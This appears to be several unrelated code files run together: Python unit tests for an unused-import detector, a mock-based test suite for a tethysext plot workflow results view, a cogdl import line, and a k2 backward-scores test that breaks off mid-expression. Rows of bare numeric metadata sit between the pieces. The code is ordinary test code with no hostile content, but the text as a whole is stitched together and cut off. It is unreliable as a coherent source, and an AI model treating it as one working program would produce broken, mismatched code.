lineno=1,
column=2,
name="Union",
package="typing",
star=False,
suggestions=[],
),
ImportFrom(
lineno=3,
column=1,
name="QWebEngineHistory",
package="PyQt5.QtWebEngineWidgets",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=1,
name="QWebHistory",
package="PyQt5.QtWebKit",
star=False,
suggestions=[],
),
],
)
def test_union_attribute(self):
self.assertUnimportEqual(
source="""\
from typing import TYPE_CHECKING, Union
if TYPE_CHECKING:
from PyQt5 import QtWebEngineWidgets
from PyQt5 import QtWebKit
HistoryType = Union['QtWebEngineWidgets.QWebEngineHistory', 'QtWebKit.QWebHistory']
""",
expected_names=[
Name(lineno=2, name="TYPE_CHECKING"),
Name(lineno=6, name="HistoryType"),
Name(lineno=6, name="QtWebEngineWidgets.QWebEngineHistory"),
Name(lineno=6, name="QtWebKit.QWebHistory"),
Name(lineno=6, name="Union"),
],
expected_imports=[
ImportFrom(
lineno=1,
column=1,
name="TYPE_CHECKING",
package="typing",
star=False,
suggestions=[],
),
ImportFrom(
lineno=1,
column=2,
name="Union",
package="typing",
star=False,
suggestions=[],
),
ImportFrom(
lineno=3,
column=1,
name="QtWebEngineWidgets",
package="PyQt5",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=1,
name="QtWebKit",
package="PyQt5",
star=False,
suggestions=[],
),
],
)
def test_cast_import(self):
self.assertUnimportEqual(
source="""\
import typing
if typing.TYPE_CHECKING:
from PyQt5.QtWebKit import QWebHistory
HistoryType = typing.cast('QWebHistory', None)
""",
expected_names=[
Name(lineno=2, name="typing.TYPE_CHECKING"),
Name(lineno=5, name="HistoryType"),
Name(lineno=5, name="QWebHistory"),
Name(lineno=5, name="typing.cast"),
],
expected_imports=[
Import(
lineno=1,
column=1,
name="typing",
package="typing",
),
ImportFrom(
lineno=3,
column=1,
name="QWebHistory",
package="PyQt5.QtWebKit",
star=False,
suggestions=[],
),
],
)
def test_cast_from(self):
self.assertUnimportEqual(
source="""\
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from PyQt5.QtWebKit import QWebHistory
HistoryType = cast('QWebHistory', return_value)
""",
expected_names=[
Name(lineno=2, name="TYPE_CHECKING"),
Name(lineno=5, name="HistoryType"),
Name(lineno=5, name="QWebHistory"),
Name(lineno=5, name="cast"),
Name(lineno=5, name="return_value"),
],
expected_imports=[
ImportFrom(
lineno=1,
column=1,
name="TYPE_CHECKING",
package="typing",
star=False,
suggestions=[],
),
ImportFrom(
lineno=3,
column=1,
name="QWebHistory",
package="PyQt5.QtWebKit",
star=False,
suggestions=[],
),
],
)
def test_cast_attribute(self):
self.assertUnimportEqual(
source="""\
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from PyQt5 import QtWebKit
HistoryType = cast('QtWebKit.QWebHistory', return_value)
""",
expected_names=[
Name(lineno=2, name="TYPE_CHECKING"),
Name(lineno=5, name="HistoryType"),
Name(lineno=5, name="QtWebKit.QWebHistory"),
Name(lineno=5, name="cast"),
Name(lineno=5, name="return_value"),
],
expected_imports=[
ImportFrom(
lineno=1,
column=1,
name="TYPE_CHECKING",
package="typing",
star=False,
suggestions=[],
),
ImportFrom(
lineno=3,
column=1,
name="QtWebKit",
package="PyQt5",
star=False,
suggestions=[],
),
],
)
| 32.555133
| 95
| 0.411002
| 575
| 8,562
| 6.036522
| 0.083478
| 0.083549
| 0.047537
| 0.051858
| 0.912993
| 0.880438
| 0.873812
| 0.870354
| 0.849611
| 0.796889
| 0
| 0.018759
| 0.495679
| 8,562
| 262
| 96
| 32.679389
| 0.785086
| 0
| 0
| 0.885714
| 0
| 0
| 0.254964
| 0.041462
| 0
| 0
| 0
| 0
| 0.02449
| 1
| 0.02449
| false
| 0
| 0.195918
| 0
| 0.22449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c21a3c3d2e0b8781bb69ca75cc08156ee1d4c22
| 23,482
|
py
|
Python
|
tethysext/atcore/tests/integrated_tests/controllers/resource_workflows/results_views/plot_workflow_results_view_tests.py
|
Aquaveo/tethysext-atcore
|
7a83ccea24fdbbe806f12154f938554dd6c8015f
|
[
"BSD-3-Clause"
] | 3
|
2020-11-05T23:50:47.000Z
|
2021-02-26T21:43:29.000Z
|
tethysext/atcore/tests/integrated_tests/controllers/resource_workflows/results_views/plot_workflow_results_view_tests.py
|
Aquaveo/tethysext-atcore
|
7a83ccea24fdbbe806f12154f938554dd6c8015f
|
[
"BSD-3-Clause"
] | 7
|
2020-10-29T16:53:49.000Z
|
2021-05-07T19:46:47.000Z
|
tethysext/atcore/tests/integrated_tests/controllers/resource_workflows/results_views/plot_workflow_results_view_tests.py
|
Aquaveo/tethysext-atcore
|
7a83ccea24fdbbe806f12154f938554dd6c8015f
|
[
"BSD-3-Clause"
] | null | null | null |
from unittest import mock
import pandas as pd
from tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view import PlotWorkflowResultView # noqa: E501
from tethysext.atcore.tests.utilities.sqlalchemy_helpers import SqlAlchemyTestCase
from tethysext.atcore.tests.utilities.sqlalchemy_helpers import setup_module_for_sqlalchemy_tests, \
tear_down_module_for_sqlalchemy_tests
from datetime import datetime
import numpy as np
def setUpModule():
setup_module_for_sqlalchemy_tests()
def tearDownModule():
tear_down_module_for_sqlalchemy_tests()
class PlotWorkflowResultViewTests(SqlAlchemyTestCase):
def setUp(self):
super().setUp()
self.instance = PlotWorkflowResultView()
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.BokehView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_bokeh(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'BokehView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
mock_pandas_data = mock.MagicMock(spec=pd.DataFrame)
mock_pandas_data.columns = ['foo', 'bar', 'baz']
mock_result.name = 'title'
mock_result.datasets = [{
'title': 'series title',
'dataset': mock_pandas_data,
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['bokeh', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'BokehView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
# Test all things were called here
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
mock_options.get.assert_has_calls([
mock.call('page_title', 'title'),
mock.call('no_dataset_message', 'No dataset found.')],
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotlyView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_plotly(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'PlotlyView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
mock_pandas_data_x = mock.MagicMock(spec=pd.DataFrame, to_list=mock.MagicMock())
mock_pandas_data_y = mock.MagicMock(spec=pd.DataFrame, to_list=mock.MagicMock())
mock_pandas_data_x.to_list.side_effect = [[1, 2, 3]]
mock_pandas_data_y.to_list.side_effect = [[4, 5, 6]]
mock_result.name = 'page_title'
data_test = [[datetime(2020, 1, 1), 5], [datetime(2020, 1, 2), 6], [datetime(2020, 1, 3), 7],
[datetime(2020, 1, 4), 8], [datetime(2020, 1, 5), 9], [datetime(2020, 1, 6), 10]]
df = pd.DataFrame(data=data_test)
mock_result.datasets = [{
'title': 'series title',
'dataset': df,
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['plotly', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'PlotlyView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
# Test all things were called here
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotlyView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_plot_object(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'PlotlyView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
mock_result.name = 'page_title'
mock_result.datasets = [{
'plot_object': 'plot_object',
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['plotly', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'PlotlyView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
# Test all things were called here
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.BokehView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_bokeh_add_series_list(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'BokehView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
data_test = [[datetime(2020, 1, 2), datetime(2020, 1, 3), datetime(2020, 1, 4), datetime(2020, 1, 5),
datetime(2020, 1, 6), datetime(2020, 1, 7)], [2, 3, 4, 5, 6, 7]]
mock_result.datasets = [{
'title': 'series title',
'dataset': data_test,
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['bokeh', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'BokehView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
# Test all things were called here
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.BokehView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_bokeh_scatter_add_series_list(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'BokehView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
data_test = [[datetime(2020, 1, 2), datetime(2020, 1, 3), datetime(2020, 1, 4), datetime(2020, 1, 5),
datetime(2020, 1, 6), datetime(2020, 1, 7)], [2, 3, 4, 5, 6, 7]]
mock_result.datasets = [{
'title': 'series title',
'dataset': data_test,
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['bokeh', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'BokehView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
# Test all things were called here
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotlyView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_add_series_list(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'PlotlyView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
data_test = [[datetime(2020, 1, 2), datetime(2020, 1, 3), datetime(2020, 1, 4), datetime(2020, 1, 5),
datetime(2020, 1, 6), datetime(2020, 1, 7)], [2, 3, 4, 5, 6, 7]]
mock_result.datasets = [{
'title': 'series title',
'dataset': data_test,
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['plotly', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'PlotlyView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
# Test all things were called here
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotlyView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_add_series_numpy(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'PlotlyView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
data_test = [np.arange('2020-01-02', '2020-01-07', dtype='datetime64[D]'), np.array([1, 2, 3, 4, 5, 6])]
mock_result.datasets = [{
'title': 'series title',
'dataset': data_test,
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['plotly', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'PlotlyView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
# Test all things were called here
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotlyView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_add_series_pandas_multiple_columns(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'PlotlyView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
data_test = {
'x': [datetime(2020, 1, 1), datetime(2020, 1, 2), datetime(2020, 1, 3), datetime(2020, 1, 4),
datetime(2020, 1, 5), datetime(2020, 1, 6)],
'y': [2, 4, 8, 16, 25, 36],
'y2': [3, 3*3, 9*3, 27*3, 9*3, 9],
}
data_test = pd.DataFrame(data=data_test)
mock_result.datasets = [{
'dataset': data_test,
'series_axes': [('x', 'y'), ('x', 'y1'), ('x', 'y2')],
'series_labels':['s1', 's2', 's3'],
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['plotly', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'PlotlyView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
# Test all things were called here
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
| 42.386282
| 155
| 0.650072
| 2,757
| 23,482
| 5.166123
| 0.048241
| 0.084884
| 0.088324
| 0.059678
| 0.947553
| 0.935477
| 0.928877
| 0.924384
| 0.910763
| 0.910763
| 0
| 0.019146
| 0.252662
| 23,482
| 553
| 156
| 42.462929
| 0.792467
| 0.022911
| 0
| 0.829218
| 0
| 0
| 0.192405
| 0.112309
| 0
| 0
| 0
| 0
| 0.067901
| 1
| 0.022634
| false
| 0
| 0.014403
| 0
| 0.039095
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c7eddbfe90550cc41593fb5c60009fbd5d441e2
| 202
|
py
|
Python
|
cogdl/wrappers/data_wrapper/heterogeneous/__init__.py
|
fishmingyu/cogdl
|
f6f33c666feb874f13eb43a8adc5db7c918778ec
|
[
"MIT"
] | 6
|
2020-07-09T02:48:41.000Z
|
2021-06-16T09:04:14.000Z
|
cogdl/wrappers/data_wrapper/heterogeneous/__init__.py
|
fishmingyu/cogdl
|
f6f33c666feb874f13eb43a8adc5db7c918778ec
|
[
"MIT"
] | null | null | null |
cogdl/wrappers/data_wrapper/heterogeneous/__init__.py
|
fishmingyu/cogdl
|
f6f33c666feb874f13eb43a8adc5db7c918778ec
|
[
"MIT"
] | 1
|
2020-05-19T11:45:45.000Z
|
2020-05-19T11:45:45.000Z
|
from .heterogeneous_embedding_dw import HeterogeneousEmbeddingDataWrapper
from .heterogeneous_gnn_dw import HeterogeneousGNNDataWrapper
from .multiplex_embedding_dw import MultiplexEmbeddingDataWrapper
| 50.5
| 73
| 0.925743
| 18
| 202
| 10.055556
| 0.555556
| 0.132597
| 0.187845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059406
| 202
| 3
| 74
| 67.333333
| 0.952632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1c9a40aa74a7e259fdc2c2340d9afb4042e5e6ab
| 12,545
|
py
|
Python
|
k2/python/tests/get_backward_scores_test.py
|
BuildJet/k2
|
9b21fc4b97cd3e746b6526cd47359bb024d06b15
|
[
"Apache-2.0"
] | 1
|
2021-03-03T03:30:40.000Z
|
2021-03-03T03:30:40.000Z
|
k2/python/tests/get_backward_scores_test.py
|
BuildJet/k2
|
9b21fc4b97cd3e746b6526cd47359bb024d06b15
|
[
"Apache-2.0"
] | 1
|
2021-03-27T15:52:06.000Z
|
2021-03-27T15:52:06.000Z
|
k2/python/tests/get_backward_scores_test.py
|
BuildJet/k2
|
9b21fc4b97cd3e746b6526cd47359bb024d06b15
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
#
# Copyright (c) 2020 Xiaomi Corp. (author: Fangjun Kuang)
#
# See ../../../LICENSE for clarification regarding multiple authors
# To run this single test, use
#
# ctest --verbose -R get_backward_scores_test_py
import unittest
import k2
import torch
class TestGetBackwardScores(unittest.TestCase):
def test_simple_fsa_case_1(self):
# see https://git.io/JtttZ
s = '''
0 1 1 0.0
0 1 2 0.1
0 2 3 2.2
1 2 4 0.5
1 2 5 0.6
1 3 -1 3.0
2 3 -1 0.8
3
'''
devices = [torch.device('cpu')]
if torch.cuda.is_available():
devices.append(torch.device('cuda'))
for device in devices:
for use_double_scores in [True, False]:
fsa = k2.Fsa.from_str(s).to(device).requires_grad_(True)
fsa_vec = k2.create_fsa_vec([fsa])
backward_scores = fsa_vec.get_backward_scores(
use_double_scores=use_double_scores, log_semiring=False)
expected_backward_scores = torch.empty_like(backward_scores)
scores = fsa.scores.detach().clone().requires_grad_(True)
expected_backward_scores[3] = 0
# yapf:disable
expected_backward_scores[2] = expected_backward_scores[3] + scores[6] # noqa
expected_backward_scores[1] = expected_backward_scores[3] + scores[5] # noqa
expected_backward_scores[0] = expected_backward_scores[1] + scores[1] # noqa
# yapf:enable
assert torch.allclose(backward_scores,
expected_backward_scores)
scale = torch.arange(backward_scores.numel()).to(device)
(scale * backward_scores).sum().backward()
(scale * expected_backward_scores).sum().backward()
assert torch.allclose(fsa.grad, scores.grad)
# now for log semiring
fsa.scores.grad = None
fsa_vec = k2.create_fsa_vec([fsa])
backward_scores = fsa_vec.get_backward_scores(
use_double_scores=use_double_scores, log_semiring=True)
expected_backward_scores = torch.zeros_like(backward_scores)
scores = fsa.scores.detach().clone().requires_grad_(True)
expected_backward_scores[3] = 0
# yapf:disable
expected_backward_scores[2] = expected_backward_scores[3] + scores[6] # noqa
# yapf:enable
expected_backward_scores[1] = (
(expected_backward_scores[2] + scores[3]).exp() +
(expected_backward_scores[2] + scores[4]).exp() +
(expected_backward_scores[3] + scores[5]).exp()).log()
expected_backward_scores[0] = (
(expected_backward_scores[1] + scores[0]).exp() +
(expected_backward_scores[1] + scores[1]).exp() +
(expected_backward_scores[2] + scores[2]).exp()).log()
assert torch.allclose(backward_scores,
expected_backward_scores)
(scale * backward_scores).sum().backward()
(scale * expected_backward_scores).sum().backward()
assert torch.allclose(fsa.grad, scores.grad)
def test_simple_fsa_case_2(self):
# see https://git.io/Jttmm
s = '''
0 1 1 0.1
0 1 2 0.2
1 2 3 0.3
1 2 4 0.4
1 2 5 0.5
2 3 6 0.6
2 3 7 0.7
3 4 -1 0.8
4
'''
devices = [torch.device('cpu')]
if torch.cuda.is_available():
devices.append(torch.device('cuda'))
for device in devices:
for use_double_scores in [True, False]:
fsa = k2.Fsa.from_str(s).to(device).requires_grad_(True)
fsa_vec = k2.create_fsa_vec([fsa])
backward_scores = fsa_vec.get_backward_scores(
use_double_scores=use_double_scores, log_semiring=False)
expected_backward_scores = torch.empty_like(backward_scores)
scores = fsa.scores.detach().clone().requires_grad_(True)
expected_backward_scores[4] = 0
# yapf:disable
expected_backward_scores[3] = expected_backward_scores[4] + scores[7] # noqa
expected_backward_scores[2] = expected_backward_scores[3] + scores[6] # noqa
expected_backward_scores[1] = expected_backward_scores[2] + scores[4] # noqa
expected_backward_scores[0] = expected_backward_scores[1] + scores[1] # noqa
# yapf:enable
assert torch.allclose(backward_scores,
expected_backward_scores)
scale = torch.arange(backward_scores.numel()).to(device)
(scale * backward_scores).sum().backward()
(scale * expected_backward_scores).sum().backward()
assert torch.allclose(fsa.grad, scores.grad)
# now for log semiring
fsa.scores.grad = None
fsa_vec = k2.create_fsa_vec([fsa])
backward_scores = fsa_vec.get_backward_scores(
use_double_scores=use_double_scores, log_semiring=True)
expected_backward_scores = torch.zeros_like(backward_scores)
scores = fsa.scores.detach().clone().requires_grad_(True)
expected_backward_scores[4] = 0
# yapf:disable
expected_backward_scores[3] = expected_backward_scores[4] + scores[7] # noqa
# yapf:enable
expected_backward_scores[2] = (
(expected_backward_scores[3] + scores[5]).exp() +
(expected_backward_scores[3] + scores[6]).exp()).log()
expected_backward_scores[1] = (
